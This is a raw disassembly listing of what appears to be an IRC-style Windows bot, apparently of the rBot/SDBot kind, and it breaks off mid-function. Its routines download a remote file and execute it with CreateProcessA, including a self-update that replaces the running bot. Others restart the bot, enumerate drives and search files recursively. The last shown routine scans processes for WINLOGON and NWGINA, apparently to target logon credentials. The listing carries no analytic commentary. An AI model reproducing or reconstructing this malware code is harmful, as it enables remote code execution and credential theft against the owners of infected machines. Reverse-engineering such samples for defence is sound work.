push [ebp+var_C]
call dword_435894 ; InternetReadFile
cmp [ebp+var_78], ebx
jz short loc_40271A
push [ebp+arg_0]
lea eax, [ebp+var_610]
push eax
call sub_4025ED
pop ecx
pop ecx
loc_40271A: ; CODE XREF: sub_40260A+FD�j
push ebx
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_610]
push eax
push [ebp+var_10]
call ds:dword_420040 ; WriteFile
add esi, [ebp+arg_0]
cmp [ebp+var_80], ebx
jz short loc_40273F
cmp esi, [ebp+var_80]
ja short loc_402784
loc_40273F: ; CODE XREF: sub_40260A+12E�j
mov eax, esi
shr eax, 0Ah
push eax
lea eax, [ebp+var_38C]
push eax
mov eax, [ebp+var_8C]
imul eax, 234h
add eax, offset dword_436480
cmp [ebp+var_88], 1
jz short loc_40276D
push offset aDownloadFileDo ; "[DOWNLOAD]: File download: %s (%dKB tra"...
jmp short loc_402772
; ---------------------------------------------------------------------------
loc_40276D: ; CODE XREF: sub_40260A+15A�j
push offset aDownloadUpdate ; "[DOWNLOAD]: Update: %s (%dKB transferre"...
loc_402772: ; CODE XREF: sub_40260A+161�j
push eax
call sub_4145E5
add esp, 10h
cmp [ebp+arg_0], ebx
ja loc_4026DC
loc_402784: ; CODE XREF: sub_40260A+133�j
cmp [ebp+var_80], ebx
mov [ebp+var_8], 1
jz short loc_4027D9
cmp esi, [ebp+var_80]
jz short loc_4027D9
push [ebp+var_80]
lea eax, [ebp+var_610]
push esi
push offset aDownloadFilesi ; "[DOWNLOAD]: Filesize is incorrect: (%d "...
push eax
mov [ebp+var_8], ebx
call sub_4145E5
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4056FB
lea eax, [ebp+var_610]
push eax
call sub_401EFF
add esp, 28h
loc_4027D9: ; CODE XREF: sub_40260A+184�j
; sub_40260A+189�j
call ds:dword_420004 ; GetTickCount
sub eax, [ebp+var_4]
xor edx, edx
mov ecx, 3E8h
div ecx
xor edx, edx
push [ebp+var_10]
mov ecx, eax
inc ecx
mov eax, esi
div ecx
mov edi, eax
call ds:dword_42003C ; CloseHandle
cmp [ebp+var_8], ebx
jz loc_402B06
cmp [ebp+var_88], 1
jz loc_4029CA
test edi, edi
mov [ebp+var_4], edi
fild [ebp+var_4]
jge short loc_402825
fadd ds:dbl_420B48
loc_402825: ; CODE XREF: sub_40260A+213�j
test esi, esi
fmul ds:dbl_420B40
push ecx
push ecx
fstp [esp+880h+var_880]
lea eax, [ebp+var_28C]
mov [ebp+var_4], esi
fild [ebp+var_4]
push eax
jge short loc_402847
fadd ds:dbl_420B48
loc_402847: ; CODE XREF: sub_40260A+235�j
fmul ds:dbl_420B40
push ecx
push ecx
lea eax, [ebp+var_610]
fstp [esp+88Ch+var_88C]
push offset aDownloadDownlo ; "[DOWNLOAD]: Downloaded %.1f KB to %s @ "...
push eax
call sub_4145E5
add esp, 1Ch
cmp [ebp+var_74], ebx
jnz short loc_40288B
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4056FB
add esp, 14h
loc_40288B: ; CODE XREF: sub_40260A+25F�j
lea eax, [ebp+var_610]
push eax
call sub_401EFF
cmp [ebp+var_84], 1
pop ecx
jnz loc_402B06
cmp [ebp+var_74], ebx
jnz short loc_4028F5
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_28C]
push eax
lea eax, [ebp+var_610]
push offset aDownloadOpenni ; "[DOWNLOAD]: Openning: %s %s."
push eax
call sub_4145E5
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4056FB
lea eax, [ebp+var_610]
push eax
call sub_401EFF
add esp, 28h
loc_4028F5: ; CODE XREF: sub_40260A+29E�j
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
push 11h
xor eax, eax
pop ecx
lea edi, [ebp+var_68]
rep stosd
mov ecx, 80h
lea edi, [ebp+var_810]
mov [ebp+var_5C], (offset asc_420AE8+2)
mov [ebp+var_68], 44h
mov [ebp+var_3C], 1
mov [ebp+var_38], bx
rep stosd
loc_40292E: ; CODE XREF: sub_40260A+335�j
mov cl, [ebp+eax+var_28C]
mov [ebp+eax+var_810], cl
inc eax
cmp cl, bl
jnz short loc_40292E
lea edi, [ebp+var_810]
dec edi
loc_402948: ; CODE XREF: sub_40260A+344�j
mov al, [edi+1]
inc edi
cmp al, bl
jnz short loc_402948
mov esi, offset asc_420AE8 ; " "
lea eax, [ebp+var_18C]
movsw
mov edx, eax
loc_40295F: ; CODE XREF: sub_40260A+35A�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_40295F
lea edi, [ebp+var_810]
sub eax, edx
dec edi
loc_40296F: ; CODE XREF: sub_40260A+36B�j
mov cl, [edi+1]
inc edi
cmp cl, bl
jnz short loc_40296F
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_68]
push eax
push ebx
push ebx
push 30h
push ebx
push ebx
push ebx
lea eax, [ebp+var_810]
push eax
and ecx, 3
push ebx
rep movsb
call ds:dword_420038 ; CreateProcessA
cmp eax, 1
lea eax, [ebp+var_810]
push eax
lea eax, [ebp+var_610]
jnz short loc_4029C0
push offset aDownloadApplic ; "[DOWNLOAD]: Application succesfully exe"...
jmp loc_402ACB
; ---------------------------------------------------------------------------
loc_4029C0: ; CODE XREF: sub_40260A+3AA�j
push offset aDownloadExecut ; "[DOWNLOAD]: Execution failed: Error exe"...
jmp loc_402ACB
; ---------------------------------------------------------------------------
loc_4029CA: ; CODE XREF: sub_40260A+205�j
test edi, edi
mov [ebp+var_4], edi
fild [ebp+var_4]
jge short loc_4029DA
fadd ds:dbl_420B48
loc_4029DA: ; CODE XREF: sub_40260A+3C8�j
test esi, esi
fmul ds:dbl_420B40
push ecx
push ecx
fstp [esp+880h+var_880]
lea eax, [ebp+var_28C]
mov [ebp+var_4], esi
fild [ebp+var_4]
push eax
jge short loc_4029FC
fadd ds:dbl_420B48
loc_4029FC: ; CODE XREF: sub_40260A+3EA�j
fmul ds:dbl_420B40
push ecx
push ecx
lea eax, [ebp+var_610]
fstp [esp+88Ch+var_88C]
push offset aDownloadDown_0 ; "[DOWNLOAD]: Downloaded %.1fKB to %s @ %"...
push eax
call sub_4145E5
add esp, 1Ch
cmp [ebp+var_74], ebx
jnz short loc_402A40
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4056FB
add esp, 14h
loc_402A40: ; CODE XREF: sub_40260A+414�j
lea eax, [ebp+var_610]
push eax
call sub_401EFF
xor eax, eax
pop ecx
lea edi, [ebp+var_24]
stosd
stosd
push 11h
stosd
pop ecx
stosd
xor eax, eax
lea edi, [ebp+var_68]
rep stosd
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_68]
push eax
push ebx
push ebx
push 30h
push ebx
push ebx
push ebx
lea eax, [ebp+var_28C]
xor esi, esi
push eax
inc esi
push ebx
mov [ebp+var_5C], (offset asc_420AE8+2)
mov [ebp+var_68], 44h
mov [ebp+var_3C], esi
mov [ebp+var_38], bx
call ds:dword_420038 ; CreateProcessA
cmp eax, esi
jnz short loc_402AAB
call dword_435900 ; WSACleanup
call sub_406A33
push ebx
call ds:dword_420034 ; ExitProcess
loc_402AAB: ; CODE XREF: sub_40260A+48D�j
lea eax, [ebp+var_28C]
push eax
push offset aDownloadUpda_0 ; "[DOWNLOAD]: Update failed: Error execut"...
jmp short loc_402AC5
; ---------------------------------------------------------------------------
loc_402AB9: ; CODE XREF: sub_40260A+45�j
lea eax, [ebp+var_38C]
push eax
push offset aDownloadBadUrl ; "[DOWNLOAD]: Bad URL, or DNS Error: %s."
loc_402AC5: ; CODE XREF: sub_40260A+4AD�j
lea eax, [ebp+var_610]
loc_402ACB: ; CODE XREF: sub_40260A+3B1�j
; sub_40260A+3BB�j
push eax
call sub_4145E5
add esp, 0Ch
cmp [ebp+var_74], ebx
jnz short loc_402AF9
push ebx
push [ebp+var_70]
lea eax, [ebp+var_610]
push eax
lea eax, [ebp+var_40C]
push eax
push [ebp+var_410]
call sub_4056FB
add esp, 14h
loc_402AF9: ; CODE XREF: sub_40260A+4CD�j
lea eax, [ebp+var_610]
push eax
call sub_401EFF
pop ecx
loc_402B06: ; CODE XREF: sub_40260A+1F8�j
; sub_40260A+295�j
push [ebp+var_C]
call dword_435844 ; InternetCloseHandle
push [ebp+var_8C]
call sub_412735
loc_402B1A: ; CODE XREF: sub_40260A+C2�j
pop ecx
push ebx
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_40260A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_402B23 proc near ; CODE XREF: sub_408A18+5099�p
; sub_408A18+51EC�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_414F14
pop ecx
pop ecx
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_402B23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402B3D proc near ; CODE XREF: sub_402C41+66�p
; sub_402C41+97�p ...
var_40 = byte ptr -40h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40h
and [ebp+var_4], 0
push esi
push edi
push 0Ch
mov esi, offset dword_433ED8
pop ecx
xor eax, eax
mov edi, esi
rep stosd
stosw
lea edi, [ebp+var_40]
push ebx
loc_402B5D: ; CODE XREF: sub_402B3D+50�j
; sub_402B3D+56�j
push 0
push 0Ah
push [ebp+arg_4]
push [ebp+arg_0]
call sub_414F60
add cl, 30h
mov [edi], cl
inc edi
mov [ebp+arg_0], eax
or eax, edx
mov [ebp+var_8], ebx
mov [ebp+arg_4], edx
jz short loc_402B95
inc [ebp+var_4]
mov eax, [ebp+var_4]
push 3
cdq
pop ecx
idiv ecx
test edx, edx
jnz short loc_402B5D
mov byte ptr [edi], 2Ch
inc edi
jmp short loc_402B5D
; ---------------------------------------------------------------------------
loc_402B95: ; CODE XREF: sub_402B3D+40�j
mov eax, esi
pop ebx
jmp short loc_402B9F
; ---------------------------------------------------------------------------
loc_402B9A: ; CODE XREF: sub_402B3D+68�j
mov cl, [edi]
mov [eax], cl
inc eax
loc_402B9F: ; CODE XREF: sub_402B3D+5B�j
dec edi
lea ecx, [ebp+var_40]
cmp edi, ecx
jnb short loc_402B9A
and byte ptr [eax], 0
pop edi
mov eax, esi
pop esi
leave
retn
sub_402B3D endp
; =============== S U B R O U T I N E =======================================
sub_402BB0 proc near ; CODE XREF: sub_402D5C+3E�p
; sub_402D5C+74�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_435774 ; GetDriveTypeA
sub eax, 0
jz short loc_402BF3
dec eax
jz short loc_402BED
dec eax
dec eax
jz short loc_402BE7
dec eax
jz short loc_402BE1
dec eax
jz short loc_402BDB
dec eax
jz short loc_402BD5
mov eax, offset a? ; "?"
retn
; ---------------------------------------------------------------------------
loc_402BD5: ; CODE XREF: sub_402BB0+1D�j
mov eax, offset aRam ; "RAM"
retn
; ---------------------------------------------------------------------------
loc_402BDB: ; CODE XREF: sub_402BB0+1A�j
mov eax, offset aCdrom ; "Cdrom"
retn
; ---------------------------------------------------------------------------
loc_402BE1: ; CODE XREF: sub_402BB0+17�j
mov eax, offset aNetwork ; "Network"
retn
; ---------------------------------------------------------------------------
loc_402BE7: ; CODE XREF: sub_402BB0+14�j
mov eax, offset aDisk ; "Disk"
retn
; ---------------------------------------------------------------------------
loc_402BED: ; CODE XREF: sub_402BB0+10�j
mov eax, offset aInvalid ; "Invalid"
retn
; ---------------------------------------------------------------------------
loc_402BF3: ; CODE XREF: sub_402BB0+D�j
mov eax, offset aUnknown ; "Unknown"
retn
sub_402BB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402BF9 proc near ; CODE XREF: sub_402C41+12�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
or eax, 0FFFFFFFFh
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov eax, dword_4357E4
test eax, eax
jz short loc_402C2E
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_18]
push ecx
push [ebp+arg_4]
call eax ; GetDiskFreeSpaceExA
loc_402C2E: ; CODE XREF: sub_402BF9+22�j
mov eax, [ebp+arg_0]
push esi
push edi
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_402BF9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C41 proc near ; CODE XREF: sub_402D5C+17�p
; sub_41175C+1BD�p
var_1B0 = byte ptr -1B0h
var_130 = byte ptr -130h
var_B0 = byte ptr -0B0h
var_30 = byte ptr -30h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1B0h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_30]
push eax
call sub_402BF9
pop ecx
pop ecx
push 6
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_402D19
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_402D19
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jz loc_402D19
push ebx
push 0
mov ebx, 400h
push ebx
push [ebp+var_14]
push [ebp+var_18]
call sub_415000
push edx
push eax
call sub_402B3D
push eax
mov edi, offset aSkb ; "%sKB"
push edi
mov esi, 80h
lea eax, [ebp+var_1B0]
push esi
push eax
call sub_41483D
add esp, 18h
push 0
push ebx
push [ebp+var_C]
push [ebp+var_10]
call sub_415000
push edx
push eax
call sub_402B3D
push eax
push edi
lea eax, [ebp+var_130]
push esi
push eax
call sub_41483D
add esp, 18h
push 0
push ebx
push [ebp+var_4]
push [ebp+var_8]
call sub_415000
push edx
push eax
call sub_402B3D
push eax
push edi
lea eax, [ebp+var_B0]
push esi
push eax
call sub_41483D
add esp, 18h
pop ebx
jmp short loc_402D48
; ---------------------------------------------------------------------------
loc_402D19: ; CODE XREF: sub_402C41+2C�j
; sub_402C41+3B�j ...
mov esi, offset aFailed ; "failed"
lea eax, [ebp+var_1B0]
push esi
push eax
call sub_4145E5
lea eax, [ebp+var_130]
push esi
push eax
call sub_4145E5
lea eax, [ebp+var_B0]
push esi
push eax
call sub_4145E5
add esp, 18h
loc_402D48: ; CODE XREF: sub_402C41+D6�j
mov eax, [ebp+arg_0]
push 60h
pop ecx
lea esi, [ebp+var_1B0]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_402C41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402D5C proc near ; CODE XREF: sub_402E1B+B�j
; sub_402E1B+51�p
var_500 = byte ptr -500h
var_380 = byte ptr -380h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 500h
push ebx
mov ebx, [ebp+arg_C]
push esi
push edi
lea eax, [ebp+var_500]
push ebx
push eax
call sub_402C41
pop ecx
pop ecx
push 60h
pop ecx
mov esi, eax
lea edi, [ebp+var_180]
rep movsd
push 7
mov edi, offset aFailed ; "failed"
lea esi, [ebp+var_80]
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_402DBC
push ebx
push ebx
call sub_402BB0
pop ecx
push eax
push offset aMainSDriveSFai ; "[MAIN]: %s Drive (%s): Failed to stat, "...
lea eax, [ebp+var_380]
push 200h
push eax
call sub_41483D
add esp, 14h
jmp short loc_402DF0
; ---------------------------------------------------------------------------
loc_402DBC: ; CODE XREF: sub_402D5C+3A�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_80]
push eax
push ebx
push ebx
call sub_402BB0
pop ecx
push eax
push offset aMainSDriveSSTo ; "[MAIN]: %s Drive (%s): %s total, %s fre"...
lea eax, [ebp+var_380]
push 200h
push eax
call sub_41483D
add esp, 20h
loc_402DF0: ; CODE XREF: sub_402D5C+5E�j
push 1
push [ebp+arg_8]
lea eax, [ebp+var_380]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
lea eax, [ebp+var_380]
push eax
call sub_401EFF
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_402D5C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E1B proc near ; CODE XREF: sub_408A18+46D4�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
xor eax, eax
cmp [ebp+arg_C], eax
jz short loc_402E2B
pop ebp
jmp sub_402D5C
; ---------------------------------------------------------------------------
loc_402E2B: ; CODE XREF: sub_402E1B+8�j
push ebx
push esi
push eax
push eax
call dword_435884 ; GetLogicalDriveStringsA
lea esi, [eax+2]
push esi
call sub_414E7D
pop ecx
mov ebx, eax
push ebx
push esi
mov [ebp+arg_C], ebx
call dword_435884 ; GetLogicalDriveStringsA
cmp byte ptr [ebx], 0
jz short loc_402E8E
push edi
loc_402E52: ; CODE XREF: sub_402E1B+6D�j
push 4
mov edi, offset aA ; "A:\\"
mov esi, ebx
pop ecx
xor eax, eax
repe cmpsb
jz short loc_402E74
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_402D5C
add esp, 10h
loc_402E74: ; CODE XREF: sub_402E1B+45�j
mov eax, ebx
lea edx, [eax+1]
loc_402E79: ; CODE XREF: sub_402E1B+63�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_402E79
sub eax, edx
lea ebx, [ebx+eax+1]
cmp [ebx], cl
jnz short loc_402E52
mov ebx, [ebp+arg_C]
pop edi
loc_402E8E: ; CODE XREF: sub_402E1B+34�j
push ebx
call sub_414A14
pop ecx
pop esi
pop ebx
pop ebp
retn
sub_402E1B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E99 proc near ; DATA XREF: sub_40E745+14�o
var_2B8 = dword ptr -2B8h
var_25C = byte ptr -25Ch
var_158 = byte ptr -158h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_28 = dword ptr -28h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
push edi
push dword_43668C
call dword_4358F4 ; closesocket
call sub_4125E2
call dword_435900 ; WSACleanup
call dword_435900 ; WSACleanup
mov ebx, ds:dword_420000
push 64h
call ebx ; Sleep
xor eax, eax
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
push 11h
pop ecx
xor eax, eax
lea edi, [ebp+var_54]
rep stosd
mov esi, 104h
push esi
lea eax, [ebp+var_158]
xor edi, edi
push eax
mov [ebp+var_48], (offset asc_420AE8+2)
mov [ebp+var_54], 44h
mov [ebp+var_28], 1
mov [ebp+var_24], di
call ds:dword_420048 ; GetSystemDirectoryA
push esi
lea eax, [ebp+var_25C]
push eax
push edi
call ds:dword_420010 ; GetModuleFileNameA
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
lea eax, [ebp+var_158]
push eax
push edi
push 28h
push 1
push edi
push edi
lea eax, [ebp+var_25C]
push eax
push edi
call ds:dword_420038 ; CreateProcessA
test eax, eax
jz short loc_402F58
push 64h
call ebx ; Sleep
push [ebp+var_10]
mov esi, ds:dword_42003C
call esi ; CloseHandle
push [ebp+var_C]
call esi ; CloseHandle
loc_402F58: ; CODE XREF: sub_402E99+A9�j
mov eax, [ebp+arg_8]
mov dword ptr [eax+0B0h], offset dword_433F0C
mov eax, [esp+2B8h+var_2B8]
mov large fs:0, eax
add esp, 8
push edi
call ds:dword_420034 ; ExitProcess
int 3 ; Trap to Debugger
sub_402E99 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402F79 proc near ; CODE XREF: sub_402F79+9E�p
; sub_4030CB+C3�p
var_54C = byte ptr -54Ch
var_34C = byte ptr -34Ch
var_248 = byte ptr -248h
var_144 = byte ptr -144h
var_118 = byte ptr -118h
var_117 = byte ptr -117h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 54Ch
push ebx
push esi
push edi
push [ebp+arg_10]
mov esi, 104h
push offset aS_1 ; "%s\\*"
lea eax, [ebp+var_248]
push esi
push eax
call sub_41483D
mov edi, ds:dword_420054
add esp, 10h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_248]
push eax
call edi ; FindFirstFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
mov ebx, offset aSS_0 ; "%s\\%s"
jz short loc_403036
loc_402FC5: ; CODE XREF: sub_402F79+BB�j
test [ebp+var_144], 10h
jz short loc_403022
cmp [ebp+var_118], 2Eh
jnz short loc_402FE9
cmp [ebp+var_117], 0
jz short loc_403022
cmp [ebp+var_117], 2Eh
jz short loc_403022
loc_402FE9: ; CODE XREF: sub_402F79+5C�j
lea eax, [ebp+var_118]
push eax
push [ebp+arg_10]
lea eax, [ebp+var_34C]
push ebx
push esi
push eax
call sub_41483D
push [ebp+arg_14]
lea eax, [ebp+var_34C]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_402F79
add esp, 2Ch
mov [ebp+arg_14], eax
loc_403022: ; CODE XREF: sub_402F79+53�j
; sub_402F79+65�j ...
lea eax, [ebp+var_144]
push eax
push [ebp+var_4]
call ds:dword_420050 ; FindNextFileA
test eax, eax
jnz short loc_402FC5
loc_403036: ; CODE XREF: sub_402F79+4A�j
push [ebp+var_4]
call ds:dword_42004C ; FindClose
push [ebp+arg_C]
lea eax, [ebp+var_248]
push [ebp+arg_10]
push ebx
push esi
push eax
call sub_41483D
add esp, 14h
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_248]
push eax
call edi ; FindFirstFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4030BC
loc_40306D: ; CODE XREF: sub_402F79+141�j
inc [ebp+arg_14]
lea eax, [ebp+var_118]
push eax
push [ebp+arg_10]
lea eax, [ebp+var_54C]
push offset aFoundSS ; " Found: %s\\%s"
push 200h
push eax
call sub_41483D
push 1
push [ebp+arg_8]
lea eax, [ebp+var_54C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 28h
lea eax, [ebp+var_144]
push eax
push esi
call ds:dword_420050 ; FindNextFileA
test eax, eax
jnz short loc_40306D
loc_4030BC: ; CODE XREF: sub_402F79+F2�j
push esi
call ds:dword_42004C ; FindClose
mov eax, [ebp+arg_14]
pop edi
pop esi
pop ebx
leave
retn
sub_402F79 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4030CB proc near ; DATA XREF: sub_408A18+2EA3�o
var_49C = byte ptr -49Ch
var_29C = dword ptr -29Ch
var_298 = byte ptr -298h
var_218 = byte ptr -218h
var_115 = byte ptr -115h
var_114 = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 49Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, eax
mov ecx, 0A7h
lea edi, [ebp+var_29C]
rep movsd
mov dword ptr [eax+298h], 1
lea eax, [ebp+var_114]
lea edx, [eax+1]
xor ebx, ebx
loc_4030FE: ; CODE XREF: sub_4030CB+38�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4030FE
sub eax, edx
cmp [ebp+eax+var_115], 5Ch
jnz short loc_40312A
lea eax, [ebp+var_114]
lea edx, [eax+1]
loc_40311A: ; CODE XREF: sub_4030CB+54�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_40311A
sub eax, edx
mov [ebp+eax+var_115], bl
loc_40312A: ; CODE XREF: sub_4030CB+44�j
lea eax, [ebp+var_218]
push eax
push offset aFindfileSearch ; "[FINDFILE]: Searching for file: %s."
lea eax, [ebp+var_49C]
push 200h
push eax
call sub_41483D
add esp, 10h
cmp [ebp+var_8], ebx
jnz short loc_40316F
push ebx
push [ebp+var_C]
lea eax, [ebp+var_49C]
push eax
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_4056FB
add esp, 14h
loc_40316F: ; CODE XREF: sub_4030CB+82�j
push ebx
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_218]
push eax
push [ebp+var_C]
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_402F79
push eax
lea eax, [ebp+var_49C]
push offset aFindfileFilesF ; "[FINDFILE]: Files found: %d."
push eax
call sub_4145E5
add esp, 24h
cmp [ebp+var_8], ebx
jnz short loc_4031CD
push ebx
push [ebp+var_C]
lea eax, [ebp+var_49C]
push eax
lea eax, [ebp+var_298]
push eax
push [ebp+var_29C]
call sub_4056FB
add esp, 14h
loc_4031CD: ; CODE XREF: sub_4030CB+E0�j
lea eax, [ebp+var_49C]
push eax
call sub_401EFF
push [ebp+var_10]
call sub_412735
pop ecx
pop ecx
push ebx
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_4030CB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4031EB proc near ; CODE XREF: sub_4037CA+AB�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 18h
and [esp+18h+var_4], 0
and [esp+18h+var_14], 0
push ebx
push ebp
push esi
mov esi, ds:dword_420060
push edi
mov ebx, 100h
push ebx
push 8
call esi ; GetProcessHeap
mov edi, ds:dword_42005C
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
lea eax, [esp+28h+var_14]
push eax
push ebx
push ebp
push 10h
call dword_434710 ; ZwQuerySystemInformation
push ebp
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_420058 ; RtlFreeHeap
push [esp+28h+var_14]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
mov eax, [esp+28h+var_14]
lea ecx, [esp+28h+var_C]
push ecx
push eax
push ebp
push 10h
mov [esp+38h+var_C], eax
call dword_434710 ; ZwQuerySystemInformation
test eax, eax
jnz short loc_4032D8
mov eax, [esp+28h+var_C]
shr eax, 4
mov [esp+28h+var_10], eax
jz short loc_4032D8
xor ecx, ecx
inc ecx
cmp eax, ecx
mov ebx, ebp
mov [esp+28h+var_18], ecx
jb short loc_4032D8
loc_403274: ; CODE XREF: sub_4031EB+EB�j
cmp word ptr [ebx+8], 5
jnz short loc_4032CB
push 0
push 0
call dword_434F18 ; RtlCreateQueryDebugBuffer
mov edi, eax
push edi
push 1
push dword ptr [ebx+4]
call dword_434F1C ; RtlQueryProcessDebugInformation
test eax, eax
jnz short loc_4032BC
mov eax, [edi+60h]
mov [esp+28h+var_8], eax
lea eax, [edi+80h]
push offset aWinlogon ; "WINLOGON"
push eax
call sub_415136
pop ecx
push eax
call sub_4150B0
test eax, eax
pop ecx
pop ecx
jnz short loc_4032F0
loc_4032BC: ; CODE XREF: sub_4031EB+AA�j
test edi, edi
jz short loc_4032C7
push edi
call dword_434F20 ; RtlDestroyQueryDebugBuffer
loc_4032C7: ; CODE XREF: sub_4031EB+D3�j
mov eax, [esp+28h+var_10]
loc_4032CB: ; CODE XREF: sub_4031EB+8E�j
add ebx, 10h
inc [esp+28h+var_18]
cmp [esp+28h+var_18], eax
jbe short loc_403274
loc_4032D8: ; CODE XREF: sub_4031EB+6D�j
; sub_4031EB+7A�j ...
xor edi, edi
loc_4032DA: ; CODE XREF: sub_4031EB+17D�j
push ebp
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_420058 ; RtlFreeHeap
mov eax, edi
loc_4032E8: ; CODE XREF: sub_4031EB+184�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 18h
retn
; ---------------------------------------------------------------------------
loc_4032F0: ; CODE XREF: sub_4031EB+CF�j
and [esp+28h+var_10], 0
cmp [esp+28h+var_8], 0
jbe short loc_403359
lea eax, [edi+80h]
mov [esp+28h+var_18], eax
loc_403306: ; CODE XREF: sub_4031EB+16C�j
add [esp+28h+var_18], 11Ch
push offset aNwgina ; "NWGINA"
push [esp+2Ch+var_18]
call sub_415136
pop ecx
push eax
call sub_4150B0
